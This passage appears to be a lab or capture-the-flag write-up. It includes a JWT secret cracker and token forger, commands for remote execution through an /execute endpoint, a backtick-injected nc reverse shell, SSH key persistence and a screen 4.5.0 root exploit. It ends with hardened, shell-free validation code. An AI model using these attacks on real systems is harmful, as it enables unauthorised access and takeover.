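def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the signature is valid under `secret`, else None."""
    head, body, sig = token.split(".")
    expected = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack, which is all john does with rockyou: one HMAC per candidate, no requests to the server."""
    head, body, sig = token.split(".")
    target = b64url_decode(sig)
    signing_input = f"{head}.{body}".encode()
    for word in wordlist:
        if hmac.compare_digest(hmac.new(word.encode(), signing_input, hashlib.sha256).digest(), target):
            return word
    return None


def forge(token: str, secret: str, **claims) -> str:
    """Re-sign the token with edited claims. Existing keys keep their order, so the output is byte-identical to jwt.io's."""
    head, body, _ = token.split(".")
    header = json.loads(b64url_decode(head))
    payload = json.loads(b64url_decode(body))
    payload.update(claims)
    return sign_hs256(header, payload, secret.encode())


# The two tokens from this writeup: issued by /login for user:user, and the admin token re-signed on jwt.io.
USER_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0."
              "cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M")
ADMIN_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
               "eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ."
               "eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk")
# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "nopassword", "letmein"]

if __name__ == "__main__":
    secret = crack_hs256(USER_TOKEN, WORDLIST)
    print("secret:", secret)
    print("forged:", forge(USER_TOKEN, secret, username="admin", role="admin"))
```

The fix on the server side is the mirror image: a long random secret (or an asymmetric algorithm with the public key pinned), plus rejecting any token whose alg differs from what the server expects, so that neither a wordlist nor an alg swap gets the attacker a signature the server trusts.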
└─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"cmd":"id"}'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>TypeError [ERR_INVALID_ARG_TYPE]: The "file" argument must be of type string. Received undefined<br> at validateString (internal/validators.js:120:11)<br> at normalizeSpawnArguments (child_process.js:411:3)<br> at spawn (child_process.js:547:16)<br> at Object.execFile (child_process.js:237:17)<br> at exec (child_process.js:158:25)<br> at /opt/login-app/app.js:69:3<br> at Layer.handle [as handle_request] (/opt/login-app/node_modules/express/lib/router/layer.js:95:5)<br> at next (/opt/login-app/node_modules/express/lib/router/route.js:144:13)<br> at /opt/login-app/app.js:112:5<br> at /opt/login-app/node_modules/jsonwebtoken/verify.js:261:12</pre>
</body>
</html>
The forged token is accepted (we got past the authorization check), but the stack trace says exec() at /opt/login-app/app.js:69 received undefined as its command: the endpoint hands a request field straight to child_process.exec, and cmd is not that field's name.

3.3. Brute-forcing the command field

Fuzz the JSON key, filtering out the 500 responses:

┌──(root㉿kali)-[~]
└─# ffuf -w /root/SecLists-master/Discovery/Web-Content/api/objects.txt -u http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -X POST -H "Content-Type: application/json" -d '{"FUZZ":"id"}' -fc 500
________________________________________________
:: Method : POST
:: URL : http://10.177.246.54:3000/execute
:: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt
:: Header : Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk
:: Header : Content-Type: application/json
:: Data : {"FUZZ":"id"}
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
[Status: 200, Size: 54, Words: 3, Lines: 2, Duration: 89ms]
* FUZZ: command
:: Progress: [3132/3132] :: Job [1/1] :: 1869 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

The field is command.

3.4. Command execution

Run a command with curl:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"command":"id"}'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Command execution works; next, a reverse shell.

3.5. Escalating to doro

The sudo rules (screenshot) show that www-data may run /home/doro/tools.py as doro. The file is only readable to us, not writable, so the script itself cannot be replaced; read it instead:

import os
import sys


def main():
    if len(sys.argv) < 2:
        print_help()
        return
    option = sys.argv[1]
    if option == "--ping":
        ping()
    elif option == "--traceroute":
        traceroute_ip()
    else:
        print("Invalid option.")
        print_help()


def print_help():
    print("Usage: python3 network_tool.py <option>")
    print("Options:")
    print("--ping Ping an IP address")
    print("--traceroute Perform a traceroute on an IP address")


def ping():
    ip_address = input("Enter an IP address: ")
    # Blacklist: no backtick, no $, so command substitution with `...` is not covered
    forbidden_chars = ["&", ";", "(", ")", "||", "|", ">", "<", "*", "?"]
    for char in forbidden_chars:
        if char in ip_address:
            print("Forbidden character found: {}".format(char))
            sys.exit(1)
    # String concatenation into os.system(), i.e. into /bin/sh -c: the blacklist is the only defence
    os.system('ping -c 2 ' + ip_address)


def traceroute_ip():
    ip_address = input("Enter an IP address: ")
    # The allow-list check below is only applied to this option, not to ping()
    if not is_valid_ip(ip_address):
        print("Invalid IP address.")
        return
    traceroute_command = "traceroute {}".format(ip_address)
    os.system(traceroute_command)


def is_valid_ip(ip_address):
    octets = ip_address.split(".")
    if len(octets) != 4:
        return False
    for octet in octets:
        if not octet.isdigit() or int(octet) < 0 or int(octet) > 255:
            return False
    return True


if __name__ == "__main__":
    main()
The ping option blacklists &, ;, (, ), |, >, <, * and ? but not the backtick, and the input is still concatenated into os.system(), i.e. into /bin/sh -c. Parentheses are blocked, so $(...) is out, but a backtick command substitution passes the filter and is evaluated by the shell. Start an nc listener on port 5555 on the attacking machine, run the script as doro with --ping, and at the prompt enter:

`nc 10.177.246.51 5555 -e /bin/bash`

Privilege escalation to doro succeeds.

doro's ~/.ssh directory contains both the public and the private key. Append the public key to authorized_keys, copy the private key to the attacking machine with permissions 600, and from then on SSH in as doro for a stable shell.

3.6. Escalating to root

Run the linpeas.sh enumeration script on the target. screen is SUID root and its version is 4.5.0, which has a known local root exploit; searchsploit finds it. Upload 41154.sh to the target and execute it: root.

3.7. Flags

flag1{ccd839df5504a7ace407b5aeca436e81}
flag2{052cf26a6e7e33790391c0d869e2e40c}
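To make the filter gap concrete, an added Python example (mine, not from the target box or the author): it replays the blacklist from tools.py against a few inputs, shows what /bin/sh does with the surviving backtick payload without actually running ping, and gives a hardened ping that validates with the ipaddress module and never goes through a shell. The sample inputs are constructed; the listener address is the one from the writeup.

```python
import ipaddress
import subprocess
from typing import List

# Blacklist copied verbatim from the target's ping() in tools.py.
FORBIDDEN = ["&", ";", "(", ")", "||", "|", ">", "<", "*", "?"]


def passes_blacklist(user_input: str) -> bool:
    """True when the target's filter lets the string through to os.system('ping -c 2 ' + user_input)."""
    return not any(ch in user_input for ch in FORBIDDEN)


def vulnerable_command(user_input: str) -> str:
    """The string that reaches /bin/sh -c on the target once the filter passes."""
    return "ping -c 2 " + user_input


def shell_expansion(user_input: str) -> str:
    """What sh makes of that string before ping would run: printf echoes the words after command substitution,
    so the backtick is evaluated here exactly as it would be on the target, but nothing else executes."""
    if not passes_blacklist(user_input):
        return ""
    cmd = "printf '%s ' " + vulnerable_command(user_input)
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout.strip()


def safe_ping_argv(user_input: str) -> List[str]:
    """Hardened form: allow-list the value with ipaddress, then build an argv list so no shell ever parses it.
    str(ip) is canonical, so a leading '-' or any metacharacter can no longer reach ping's argv."""
    ip = ipaddress.ip_address(user_input.strip())  # raises ValueError for anything that is not a v4/v6 address
    return ["ping", "-c", "2", str(ip)]


def rejects(user_input: str) -> bool:
    """True when the hardened validator refuses the input."""
    try:
        safe_ping_argv(user_input)
    except ValueError:
        return True
    return False


def safe_ping(user_input: str) -> int:
    """Run the hardened ping without a shell; returns the exit status. Not used by the test (needs a network)."""
    return subprocess.run(safe_ping_argv(user_input), check=False).returncode


if __name__ == "__main__":
    # Constructed inputs: a real address, the writeup's backtick payload, and a $(...) attempt that the parentheses block.
    for probe in ["10.177.246.51", "`nc 10.177.246.51 5555 -e /bin/bash`", "$(id)"]:
        print(f"{probe!r}: blacklist passes={passes_blacklist(probe)} hardened rejects={rejects(probe)}")
    print("sh sees:", shell_expansion("`echo injected`"))
```

The two checks differ in kind, not just in coverage: the blacklist asks "does this contain something I know is bad", which any character it forgot defeats, while the allow-list asks "is this exactly an IP address", and the argv list removes the shell from the path entirely, so even a future validation mistake cannot turn into command execution.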